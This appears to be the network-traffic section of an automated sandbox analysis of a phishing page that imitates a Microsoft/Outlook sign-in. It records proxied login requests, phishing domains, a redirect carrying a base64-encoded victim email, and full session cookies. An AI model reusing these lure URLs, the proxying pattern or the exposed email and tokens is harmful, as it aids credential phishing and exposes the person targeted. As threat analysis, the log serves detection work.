https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /cabinetworksgroup.com/winauth/ssoprobe?client-request-id=d9a3f2e3-2164-d85d-3b2e-287dc34359ee&_=1718985578804 HTTP/1.1Host: autologon.microsoftazuread-sso.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_f7b06b70c72b4590b779.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /common/instrumentation/dssostatus HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ== HTTP/1.1Host: kenfong.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: kenfong.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://kenfong.com/winner/54799//bGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: 5rve2bms.r.eu-west-1.awstrack.me
Source: global traffic	DNS traffic detected: DNS query: m.exactag.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: kenfong.com
Source: global traffic	DNS traffic detected: DNS query: venicuttnortheastusa.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: webnnicuttnortheastusa.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: outlook.office365.com
Source: global traffic	DNS traffic detected: DNS query: r4.res.office365.com
Source: global traffic	DNS traffic detected: DNS query: autologon.microsoftazuread-sso.com
Source: global traffic	DNS traffic detected: DNS query: passwordreset.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2918sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 1eefe65da7da1cbsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jun 2024 15:59:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 2RwOJ4Ux3+souhlQLR6dkg==$GhVKVMbytRzdd80NyvIs4Q==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89753425af83c3f8-EWRalt-svc: h3=":443"; ma=86400
